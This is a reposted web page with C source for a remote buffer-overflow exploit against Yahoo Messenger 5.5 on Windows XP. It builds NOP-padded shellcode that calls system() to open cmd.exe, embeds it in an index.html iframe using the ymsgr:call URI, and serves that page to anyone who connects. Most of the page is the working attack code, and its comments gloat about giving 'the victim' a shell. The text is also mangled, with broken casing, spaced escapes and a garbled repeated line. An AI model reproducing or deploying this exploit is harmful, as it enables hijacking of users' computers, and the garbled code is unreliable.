2. Tech
  3. Yahoo Messenger V5.5 Remote Exploit (DSR-DUCKY.C)

Yahoo Messenger V5.5 Remote Exploit (DSR-DUCKY.C)

xiaoxiao2021-03-06  64

/ *

*

* --- [Remote Yahoo Messenger V5.5 Exploiter on Windows XP] ---

*

* DTORS Security Research (DSR)

* Code by: rave

*

* The buffer loospi

*

* | - <- <- <- |

*

* ^ __________ ^

*

*

* /

#include

#include

#include

#include

#include / * There Are The Usual Header Files * /

#include

#include

#include

#define maxDataSize 555 / * max number of bytes of data * /

#define backlog 200 / * Number of %ified Connections * /

Static int port = 80;

/ * library entry inside msvcrt.dll to jmp 0xc (eb0c); * /

Char sraddress [8] = "/ x16 / xd8 / xe8 / x77";

/ * This shellcode just executes cmd.exe nothing special here ..

* The Victim Gets a cmd shell on his desktop :) lol! /

* /

Unsigned char shellcode [] =

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ X8B / XEC / X55 / X8B / XEC / X68 / X20 / X68 / X63 / X6D / X64 / X2E / X8D / X45 / XF8 / X50 / XB8"

"/ x44 / x80 / ​​xbf / x77" // 0x78bf8044 <- adress of system ()

"/ XFF / XD0"; // Call System ()

Static int port;

Void usage (char * programname)

{

Printf ("/ N / t / t ----------------------------------------- -------- / n ");

Printf ("/ T / T / T / TDTORS Security Research (DSR) / N");

Printf ("/ t / t / t / tcode by: rave / n");

Printf ("/ t / t / t / tmail: rave@dttors.net/n");

Printf ("/ t / t ----------------------------------------- ------ / n / n ");

/ * MODIFY Here to Add your USAGE Message When THE Program IS

* Called without arguments * /

Printf ("/ t / t ----------------------------------------- ------ / n / n "); FPRINTF (stdout," / t / tp local webserver server portnumber / n ");

FPRINTF (stdout, "/ t / t-g greatz to: / n / n / N / N / N");

Printf ("/ t / t ----------------------------------------- ------ / n / n ");

}

/ * returns the index of the first argument That is not an option; i.e.

Does Not Start with a Dash OR a SLASH

* /

INT HandleOptions (int Argc, char * argv [])

{

INT I, FIRSTNONOPTION = 0;

For (i = 1; i

IF (argv [i] [0] == '/' || argv [i] [0] == '-') {

Switch (argv [i] [1]) {

/ * An Argument -? Means Help is Requested * /

Case '?':

USAGE (Argv [0]);

Break;

Case 'P':

Port = ATOI (Argv [i 1]); Break;

Case 'h':

IF (! Stricmp (Argv [i] 1, "Help")) {

USAGE (Argv [0]);

Break;

}

/ * If the option --h means anything else

* in Your Application Add Code Here

* Note: This Falls through to the default

* To print an "unknow option" message

* /

/ * Add your option switches here * /

DEFAULT:

FPRINTF (stderr, "unknown option% S / N", argv [i]);

Break;

}

}

Else {

FirstnonOption = i;

Break;

}

}

Return firstnonoption;

}

Int main (int Argc, char * argv [])

{

File * fptr;

UNSIGNED Char Buffer [5000];

INT offset = 320; // <- the offset off the buffer = 320 x NOP; (AT 321 WHE BEGIN THE INSTRUCTION POINTER CHANGE)

INT FD, FD2, I, Numbytes, Sin_SIZE; / * Files Descriptors * /

Char SD [MaxDataSize]; / * SD WILL STORE Send Text * /

Struct SockAddr_in Server; / * Server's Address Information * /

Struct SockAddr_in Client; / * Client's Address Information * /

Struct Hostent * He; / * Pointer for the host entry * /

Wsadata WSDATA;

WSASTARTUP (0x0101, & wsdata); if (argc == 1) {

/ * If no arguments we call the usage routine and exit * /

USAGE (Argv [0]);

Return 1;

}

HandleOptions (Argc, Argv);

FPRINTF (stdout, "creating index.html:");

IF ((FPTR = FOPEN ("INDEX.HTML", "W")) == null) {

FPRINTF (stderr, "failed / n");

Exit (1);

} else {

FPRINTF (stderr, "done / n");

}

// Memseting the buffers for preperation

MEMSET (SD, 0x00, MaxDataSize);

MEMSET (Buffer, 0x00, Offset 32 Strlen (Shellcode);

MEMSET (Buffer, 0x90, Offset);

// WHE PLACE THE A JMP EBP 0x3 Instuction Inside the Buffer

// TO JUMP over The Eip Changing bytes at the en offset

//

// JMP 0x3

/ / | ____________ ^

Buffer [offset-4] = 0xeb;

Buffer [offset-3] = 0x03;

Memcpy (buffer offset, sraddress, 4);

Memcpy (Buffer Offset 4, Shellcode, Strlen (shellcode);

// here whe Make the index.html

// Whe Open it again if some connects to the expeling server

// and send it over to the VICTIM.

FPRINTF (FPTR, ", 0x22, 0x22);

FPRINTF (FPTR, "");

FPRINTF (FPTR, " oohh my god expedition </ title> / n");</p> <p>FPRINTF (FPTR, "<body BGColor =% CBLACK% C>", 0x22, 0x22);</p> <p>FPRINTF (FPTR, "<Body>");</p> <p>FPRINTF (FPTR, "<font color =% C # c0c0c0% c size =% C2% C Face =% Cverdana, Arial, Helvetica, Sans-Serif% C>,</p> <p>0x22, 0X22, 0X22, 0X22, 0X22, 0X22);</p> <p>FPRINTF (FPTR, "<B> DTORS Security Research (DSR) </ b> / n");</p> <p>FPRINTF (FPTR, "<P> Yah000 Messager Version 5.5 Exploit .... </ p> / n");</p> <p>FPRINTF (FPTR, "<pre>"); FPRINTF (FPTR, "<iframe src =% Cymsgr: Call?% s% c> Contach Heaven </ html> </ body> / x00 / x00 / x00", 0x22, Buffer, 0x22);</p> <p>FPRINTF (FPTR, "<iframe src =% chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c> .... </ html></p> <p></ body> / x00 / x00 / x00 ", 0x22, 0x22);</p> <p>Fclose (fptr); // <- Closing Index.html Again</p> <p>// Some extra debuging information</p> <p>FPRINTF (stdout, "using port:% d / n", port);</p> <p>FPrintf (stdout, "/ nstarting server http: // localhost:% d:", port);</p> <p>IF ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {/ * Calls Socket () * /</p> <p>Printf ("Socket () error / n");</p> <p>Exit (1);} else {</p> <p>FPRINTF (stderr, "done / n");</p> <p>}</p> <p>Server.sin_family = af_INet;</p> <p>Server.sin_port = htons (port);</p> <p>Server.sin_addr.s_addr = incddr_Addr = INADDR_Anddr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr = INADDR_Addr_Anddr_Anddr_Addr =</p> <p>MEMSET (Server.sin_Zero, 0, 8); / * Zero the rest of the structure * /</p> <p>IF (Bind (Struct Sockaddr *) & Server, SIZEOF (Struct SockAddr) == - 1) {</p> <p>/ * Calls bind () * /</p> <p>Printf ("Bind () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>IF (Listen (FD, Backlog) == -1) {/ * calls listen () * /</p> <p>Printf ("Listen () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>While (1) {</p> <p>SIN_SIZE = SIZEOF (struct sockaddr_in);</p> <p>IF ((FD2 = Accept (FD, Struct SockAddr *) & Client, & Sin_Size)) == - 1) {</p> <p>/ * Calls acception () * /</p> <p>Printf ("accept () error / n");</p> <p>Exit (1);</p> <p>}</p> <p>IF ((he = gethostByname (inet_ntoa (client.sin_addr)) == null) {</p> <p>Printf ("gethostbyname () error / n");</p> <p>EXIT (-1);</p> <p>}</p> <p>Printf ("You Got a connection from% s (% s) / n",</p> <p>INET_NTOA (Client.sin_ADDR), He-> h_name;</p> <p>/ * Prints Client's IP * /</p> <p>FPRINTF (stdout, "/ nopening index.html for remote user:");</p> <p>IF ((FPTR = FOPEN ("INDEX.HTML", "R")) == null) {fprintf (stderr, "failed / n");</p> <p>Exit (1);</p> <p>} else {</p> <p>FPRINTF (stderr, "done / n");</p> <p>}</p> <p>FPrintf (stdout, "sending the overflow string ...");</p> <p>// reading the index.html file and sending its</p> <p>// contents to the connect Victim</p> <p>While (! feof (fptr)) {</p> <p>Send (FD2, SD, STRLEN (SD), 0);</p> <p>NumBytes = Fread (SD, SIZEOF (CHAR), MAXDATASIZE, FPTR);</p> <p>SD [Numbytes * SizeOf (Char)] = '/ 0';</p> <p>}</p> <p>Send (FD2, SD, STRLEN (SD), 0);</p> <p>Printf ("/ n / n / narxploit done .... / n / n / n");</p> <p>Printf ("A shell is started @% s :) lol / n / n / npress any key to exit the expedition", inet_ntoa (client.sin_addr), he-> h_name;</p> <p>Gets (sd);</p> <p>exit (0);</p> <p>}</p> <p>Return 0;</p> <p>}</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-111318.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="111318" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.052</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'jeRS8Le0pwsn1DLNloYISnMvoX3WLmfpMeC4fFscQCywgBwCyOKbNwGpDoABQaXD1LapRxitk45KDqTsagaHtw_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>